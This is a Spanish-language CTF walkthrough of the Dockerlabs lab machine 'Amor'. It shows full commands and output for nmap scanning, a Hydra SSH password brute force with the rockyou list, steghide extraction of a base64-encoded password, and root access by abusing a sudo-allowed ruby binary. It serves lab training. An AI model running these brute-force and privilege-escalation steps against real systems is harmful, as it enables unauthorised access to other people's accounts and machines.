Amor

TAG -> Dockerlabs | CTF

Datos

Máquina -> Amor
Dificultad -> Fasil
Creador -> Romabri

Estando en la carpeta de trabajo, como siempre probamos conexión con la maquina objetivo.

❯ ping -c 1 172.17.0.2 -R
PING 172.17.0.2 (172.17.0.2) 56(124) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.144 ms
RR: 	172.17.0.1
		172.17.0.2
		172.17.0.2
		172.17.0.1

--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.144/0.144/0.144/0.000 ms

La maquina nos responde correctamente y mediante el TTL intuimos que es una maquina Linux, con mkt creamos nuestras carpetas adicionales, entramos a recognition y hacemos un escaneo primario para tener una mejor idea de nuestro objetivo.

❯ PortScanner -i 172.17.0.2 -t 1000 -s 2 -a V C -o recognition.txt

[+] Autor: Anonymous17
[+] Targeted: 172.17.0.2
[+] (TTL -> 64): Linux
[!] Escaneo de puertos (socket):

  [!] Puerto 22 abierto!
  [!] Puerto 80 abierto!
  [+] Port: 1000 / 1000 

[+] Lista de puertos abiertos: [22, 80]
[+] Información de servicios y versiones:

  [+] 22/tcp    ssh       OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
  [+] 80/tcp    http      Apache httpd 2.4.58 ((Ubuntu))

[+] Comprobando vulnerabilidades:

  [+] SSH parece seguro contra enumeración de usuarios  
  [+] Tecnologías detectadas en HTTP:

        http://172.17.0.2:80 [200 OK] Apache[2.4.58],
        Country[RESERVED][ZZ],
        HTML5,
        HTTPServer[Ubuntu Linux][Apache/2.4.58 (Ubuntu)],
        IP[172.17.0.2],
        Title[SecurSEC S.L],

[*] Evidencia guardada en recognition.txt

Vemos el puerto 22 y 80 abiertos, verificamos con nmap posibles vulnerabilidades.

❯ nmap -sCV -p 22,80 172.17.0.2 -oN targeted.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 15:37 EST
Nmap scan report for 172.17.0.2
Host is up (0.0016s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 7e:72:b6:8b:5f:7c:23:64:dc:15:21:32:5f:ce:40:0a (ECDSA)
|_  256 05:8a:a7:27:0f:88:b9:70:84:ec:6d:33:dc:ce:09:6f (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: SecurSEC S.L
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds

No vemos nada interesante, así que procedemos a hacer un escaneo más exhaustivo.

❯ nmap -A --script http-headers 172.17.0.2 -oX xml -oN targeted_A.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 15:39 EST
Nmap scan report for 172.17.0.2
Host is up (0.065s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-headers: 
|   Date: Sat, 12 Oct 2024 20:39:50 GMT
|   Server: Apache/2.4.58 (Ubuntu)
|   Last-Modified: Fri, 26 Apr 2024 10:32:34 GMT
|   ETag: "bd9-616fd6bf4b480"
|   Accept-Ranges: bytes
|   Content-Length: 3033
|   Vary: Accept-Encoding
|   Connection: close
|   Content-Type: text/html
|   
|_  (Request type: HEAD)
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   64.65 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

En este escaneo tampoco vemos nada sospechoso, también podemos hacer un escaneo más completo de vulnerabilidades, pero en este caso nos dirijamos a la web para ver de que se trata la página, notamos que es una especie de foro en el cual publican las actividades internas de la empresa como ataques cibernéticos, despidos o malas prácticas de ciberseguridad, vemos algunos usuarios de los cuales carlota destaca por ser la encargada del departamento de ciberseguridad, así que procedemos a hacer fuerza bruta con Hydra.

❯ hydra -l carlota -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 4 -f -V
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-12 15:50:18
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "iloveyou" - 5 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "princess" - 6 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "1234567" - 7 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "rockyou" - 8 of 14344399 [child 3] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "12345678" - 9 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "abc123" - 10 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "nicole" - 11 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "daniel" - 12 of 14344399 [child 3] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "babygirl" - 13 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "monkey" - 14 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "lovely" - 15 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "jessica" - 16 of 14344399 [child 3] (0/0)
[22][ssh] host: 172.17.0.2   login: carlota   password: babygirl
[STATUS] attack finished for 172.17.0.2 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-12 15:50:30

Acertamos, carlota tenia una contraseña débil, así que nos conectamos por ssh y guardamos las credenciales en content.

❯ ssh carlota@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:JcHOk/pc2uhMVqRRfurQicP/JMoOAOHmPYJ2pPxOqx0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
carlota@172.17.0.2's password: 
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.9.7-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
$ bash
carlota@de05017a2d3a:~$ ls
Desktop
carlota@de05017a2d3a:~$ cd Desktop/fotos/vacaciones/           
carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$ ls
imagen.jpg
carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$

En el directorio de carlota vemos una serie de carpetas y una foto, procedemos a descargarla.

❯ scp carlota@172.17.0.2:/home/carlota/Desktop/fotos/vacaciones/imagen.jpg /root/CTF/Dockerlabs/amor/content
carlota@172.17.0.2's password: 
imagen.jpg                                                                                                                            100%   51KB   6.2MB/s   00:00    
❯ ls
 credentials.txt   imagen.jpg

Intentamos ver si hay información oculta en la imagen usando steghide.

❯ steghide extract -sf imagen.jpg
Anotar salvoconducto: 
anot los datos extrados e/"secret.txt".
❯ ls
 credentials.txt   imagen.jpg   secret.txt
❯ bat secret.txt
───────┬─────────────────────────────────────────────────────────────────
       │ File: secret.txt
───────┼─────────────────────────────────────────────────────────────────
   1   │ ZXNsYWNhc2FkZXBpbnlwb24=
───────┴─────────────────────────────────────────────────────────────────

Dentro de la imagen hay archivo txt el cual contiene una especie de cifrado aunque en realidad es base64 por lo cual solo lo decodificamos.

❯ echo "ZXNsYWNhc2FkZXBpbnlwb24=" | base64 -d; echo
eslacasadepinypon

Obtenemos una especie de contraseña.

carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$ su root
Password: 
su: Authentication failure
carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$ cd
carlota@de05017a2d3a:~$ cd ..
carlota@de05017a2d3a:/home$ ls
carlota  oscar  ubuntu
carlota@de05017a2d3a:/home$ su oscar
Password: 
$ bash
oscar@de05017a2d3a:/home$ cd
oscar@de05017a2d3a:~$

Intentamos con root y no son sus credenciales, pero vemos otro usuario en el sistema y resulta que las credenciales son de oscar.

oscar@de05017a2d3a:~$ sudo -l
Matching Defaults entries for oscar on de05017a2d3a:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User oscar may run the following commands on de05017a2d3a:
    (ALL) NOPASSWD: /usr/bin/ruby

Es interesante que oscar pueda ejecutar ruby como super usuario sin ingresar las credenciales de root por lo cual intentaremos abusar de este binario usando searchbins

❯ searchbins -b ruby

[+] Binary: ruby

[*] Functions: -> [https://gtfobins.github.io/gtfobins/ruby]

	[✔] capabilities (1)
	[✔] file-download (1)
	[✔] file-read (1)
	[✔] file-upload (1)
	[✔] file-write (1)
	[✔] library-load (1)
	[✔] reverse-shell (1)
	[✔] shell (1)
	[✔] sudo (1)

[*] Execute: -> searchbins -b ruby -f <function> (For a specific function)

	    -> searchbins -b ruby -a (For all available functions)

❯ searchbins -b ruby -f sudo

[+] Binary: ruby

================================================================================
[*] Function: sudo -> [https://gtfobins.github.io/gtfobins/ruby/#sudo]

	| sudo ruby -e 'exec "/bin/sh"'

Usando el comando proporcionado por searchbins nos convertimos en root.

oscar@de05017a2d3a:~$ sudo ruby -e 'exec "/bin/sh"'
# bash
root@de05017a2d3a:/home/oscar# cd
root@de05017a2d3a:~# whoami
root

Perfecto ya tenemos los máximos privilegios, podemos ver una flag de agradecimiento por parte del creador de la maquina.

root@de05017a2d3a:~# ls
Desktop
root@de05017a2d3a:~# cat Desktop/THX.txt 
Gracias a toda la comunidad de Dockerlabs y a Mario por toda la ayuda proporcionada para poder hacer la máquina.
root@de05017a2d3a:~#

PreviousDockerlabs NextBreakMySSH

Last updated 4 months ago